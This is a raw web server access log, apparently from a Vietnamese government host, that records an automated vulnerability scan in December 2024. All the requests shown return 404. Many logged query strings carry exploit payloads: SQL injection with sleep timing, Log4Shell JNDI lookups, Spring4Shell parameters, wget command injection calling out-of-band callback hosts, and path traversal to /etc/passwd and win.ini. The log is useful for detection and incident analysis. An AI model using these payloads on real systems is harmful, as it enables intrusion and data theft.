Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 - 404 7 0 234 2024-12-12 11:02:42 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 11:02:47 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.24 - 404 7 0 201 2024-12-12 11:02:50 103.153.214.94 GET /wp-content/plugins/documentor-lite/core/js/documentor.js - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.138+Safari/537.36 - 404 7 0 204 2024-12-12 11:04:48 103.153.214.94 POST /install/install.php step=4 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 41 2024-12-12 11:05:01 103.153.214.94 GET /install/includes/configure.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 31 2024-12-12 11:05:57 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 206 2024-12-12 11:06:21 103.153.214.94 GET /wp-admin/admin-ajax.php action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 208 2024-12-12 11:06:24 103.153.214.94 POST /wp-admin/admin-ajax.php action=wpt_admin_update_notice_option 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 11:06:58 103.153.214.94 POST /admin/ajax.php action=login 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 41 2024-12-12 11:07:14 103.153.214.94 GET /admin/index.php page=home 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 34 2024-12-12 11:08:23 103.153.214.94 GET /pingmessages - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 43 2024-12-12 11:08:23 103.153.214.94 POST /goform/formping - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.23 - 404 7 0 55 2024-12-12 11:10:04 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.2+Safari/605.1.15 - 404 7 0 210 2024-12-12 11:10:08 103.153.214.94 GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 236 2024-12-12 11:10:17 103.153.214.94 POST /cgi-bin/Save.cgi cgi=PING 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 - 404 7 0 33 2024-12-12 11:10:57 103.153.214.94 POST /wp-json/am-member/license - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.93+Safari/537.36 - 404 7 0 238 2024-12-12 11:11:36 103.153.214.94 POST / rest_route=/olistener/new 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 202 2024-12-12 11:11:38 103.153.214.94 GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 202 2024-12-12 11:11:41 103.153.214.94 GET /proxy url=http%3a//0:8080/ 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 202 2024-12-12 11:11:54 103.153.214.94 POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 206 2024-12-12 11:12:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 226 2024-12-12 11:13:52 103.153.214.94 GET /wp-json/metform/v1/forms/templates/0 - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 11:14:28 103.153.214.94 POST /Citrix/XenApp/auth/login.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected 404 7 0 113 2024-12-12 11:14:44 103.153.214.94 GET /api/search/attribute versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.2+Safari/605.1.15 - 404 7 0 211 2024-12-12 11:14:46 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/112.0 - 404 7 0 197 2024-12-12 11:14:47 103.153.214.94 GET /service/0/test.oast.me - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 214 2024-12-12 11:17:44 103.153.214.94 POST /mgmt/tm/util/bash - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 206 2024-12-12 11:18:12 103.153.214.94 POST /wp-admin/admin.php page=html2wp-settings 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 201 2024-12-12 11:18:15 103.153.214.94 GET /wp-content/uploads/html2wp/2q6JQakYQRfQ27lpiZJiPQplvDK.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 232 2024-12-12 11:18:21 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 209 2024-12-12 11:18:58 103.153.214.94 POST /OA/PM/svc.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 55 2024-12-12 11:20:28 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.41 - 404 7 0 207 2024-12-12 11:20:31 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 11:20:33 103.153.214.94 GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.1+Safari/605.1.15 - 404 7 0 214 2024-12-12 11:20:50 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.15 - 404 7 0 204 2024-12-12 11:20:54 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 248 2024-12-12 11:20:56 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 201 2024-12-12 11:21:44 103.153.214.94 GET / cb=77293 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 33 2024-12-12 11:21:59 103.153.214.94 GET / cb=77293 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 38 2024-12-12 11:22:15 103.153.214.94 GET / cb=77293 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 11:23:13 103.153.214.94 GET /backend/backend/auth/signin - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 11:24:22 103.153.214.94 GET /Server/CmxUser.php pgid=UserList 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.12;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 42 2024-12-12 11:24:40 103.153.214.94 POST /functionRouter - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 257 2024-12-12 11:25:16 103.153.214.94 GET / cb=64699 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 59 2024-12-12 11:25:32 103.153.214.94 GET / cb=64699 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 404 7 0 32 2024-12-12 11:25:48 103.153.214.94 GET / cb=64699 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 11:28:16 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 11:28:19 103.153.214.94 GET /wp-admin/admin-ajax.php action=easync_success_and_save 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 - 404 7 0 231 2024-12-12 11:28:54 103.153.214.94 GET /db_dump.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 https://bcvt.kontum.gov.vn:8172/user_add.php 404 7 0 40 2024-12-12 11:29:22 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 11:29:22 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://ctd67t3bclspkptm3qo0uet6fe6qb3sc6.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 202 2024-12-12 11:29:22 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.15 - 404 7 0 202 2024-12-12 11:29:22 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://ctd67t3bclspkptm3qo0cj5h7b4htsi83.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 208 2024-12-12 11:29:55 103.153.214.94 GET /Service.do Action=Download&Path=C:/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 39 2024-12-12 11:30:00 103.153.214.94 POST /admin/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 11:30:22 103.153.214.94 GET / location=search 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:105.0)+Gecko/20100101+Firefox/105.0 - 404 7 0 198 2024-12-12 11:31:16 103.153.214.94 POST /cms/content/list - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 211 2024-12-12 11:31:16 103.153.214.94 POST /ca/rest/certrequests - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 11:32:26 103.153.214.94 POST /api.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 11:32:44 103.153.214.94 GET /csz-cms/plugin/article/search p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 47 2024-12-12 11:34:01 103.153.214.94 POST /restrito/login/sub/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 58 2024-12-12 11:34:15 103.153.214.94 GET /restrito/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 63 2024-12-12 11:35:05 103.153.214.94 POST /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 61 2024-12-12 11:35:25 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 203 2024-12-12 11:35:27 103.153.214.94 GET /OA_CGI/FNDWRR.exe - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 207 2024-12-12 11:35:29 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 198 2024-12-12 11:35:33 103.153.214.94 GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.25 - 404 7 0 209 2024-12-12 11:35:33 103.153.214.94 GET /wp-json/rps_result/v1/route/student_fields - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 218 2024-12-12 11:35:36 103.153.214.94 GET /wp-admin/admin-post.php vrc_cmd=phpinfo 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 242 2024-12-12 11:35:38 103.153.214.94 GET /wp-json/rps_result/v1/route/search_student department_id=1&batch_id=1 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 234 2024-12-12 11:36:28 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 217 2024-12-12 11:38:05 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 11:38:09 103.153.214.94 POST /actuator/gateway/routes/2q6JQf6vgvdUvmI9MwB1EFX55xU - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 200 2024-12-12 11:38:12 103.153.214.94 POST /actuator/gateway/refresh - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/85.0.4183.127+Safari/537.36 - 404 7 0 203 2024-12-12 11:38:15 103.153.214.94 DELETE /actuator/gateway/routes/2q6JQf6vgvdUvmI9MwB1EFX55xU - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:96.0)+Gecko/20100101+Firefox/96.0 - 404 7 0 221 2024-12-12 11:38:17 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 38 2024-12-12 11:38:49 103.153.214.94 POST /apisix/batch-requests - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 241 2024-12-12 11:38:49 103.153.214.94 GET /api/2q6JQhutZxHzAiHLfHwFxyzFN4h - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 204 2024-12-12 11:39:31 103.153.214.94 GET /vcac/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 223 2024-12-12 11:39:33 103.153.214.94 GET /vcac/ original_uri=https://bcvt.kontum.gov.vn:8172%2Fvcac 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 237 2024-12-12 11:40:30 103.153.214.94 POST /cgi-bin/nightled.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 217 2024-12-12 11:40:36 103.153.214.94 POST /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.15 - 404 7 0 202 2024-12-12 11:41:12 103.153.214.94 POST /geoserver/wms - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 204 2024-12-12 11:42:16 103.153.214.94 GET /cgi-bin/mesh.cgi page=upgrade&key=;%27wget+http://ctd67t3bclspkptm3qo0age4yy8c9wur4.oast.fun;%27 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 11:42:16 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://ctd67t3bclspkptm3qo0xyuz7pa4ygaxn.oast.fun; 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 206 2024-12-12 11:46:13 103.153.214.94 GET /modules/appagebuilder/config.xml - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 11:46:19 103.153.214.94 POST /modules/appagebuilder/apajax.php rand=7907953374931 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 https://bcvt.kontum.gov.vn:8172 404 7 0 206 2024-12-12 11:46:21 103.153.214.94 POST /modules/appagebuilder/apajax.php rand=6761132075242 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 https://bcvt.kontum.gov.vn:8172 404 7 0 215 2024-12-12 11:46:24 103.153.214.94 POST /modules/appagebuilder/apajax.php rand=3350028325392 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 228 2024-12-12 11:46:51 103.153.214.94 POST /alerts/alertConfigField.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 205 2024-12-12 11:46:52 103.153.214.94 POST /alerts/alertLightbox.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 222 2024-12-12 11:49:14 103.153.214.94 POST /index.php mod=system&op=orgtree&do=orgtree 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.87+Safari/537.36 - 404 7 0 63 2024-12-12 11:49:24 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 244 2024-12-12 11:49:35 103.153.214.94 POST /Upload/upload_file.php l=test 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 39 2024-12-12 11:49:47 103.153.214.94 GET /Upload/test/2q3kZAOZpE7Myiy9OHE7398IuDn.php - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 11:49:59 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Safari/605.1.15 - 404 7 0 34 2024-12-12 11:50:10 103.153.214.94 POST /admin/uploads.php id=1 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 210 2024-12-12 11:50:14 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2q6JQYo3TdqG59PBlP1aFQHemdZ` 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 230 2024-12-12 11:50:17 103.153.214.94 GET /2q6JQYo3TdqG59PBlP1aFQHemdZ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 222 2024-12-12 11:50:44 103.153.214.94 GET /index.php/video/ dl=aHR0cHM6Ly9vYXN0Lm1lLw== 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 200 2024-12-12 11:50:49 103.153.214.94 POST /dologin.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 11:51:46 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+i686;+pt-BR;+rv:1.9.0.3)+Gecko/2008092510+Ubuntu/8.04+(hardy)+Firefox/3.0.3 - 404 7 0 202 2024-12-12 11:53:46 103.153.214.94 GET /php/connector.minimal.php cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 48 2024-12-12 11:54:43 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 11:54:43 103.153.214.94 POST /OASREST/v2/authenticate - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.1 - 404 7 0 205 2024-12-12 11:54:45 103.153.214.94 GET /_search a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-655%7D$%7B%3A-412%7D.$%7BhostName%7D.search.ctcj3jjbclslbev4n7q0wr6k6kzja1uwh.oast.live%7D 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 69 2024-12-12 11:54:53 103.153.214.94 GET /elfinder/php/connector.minimal.php 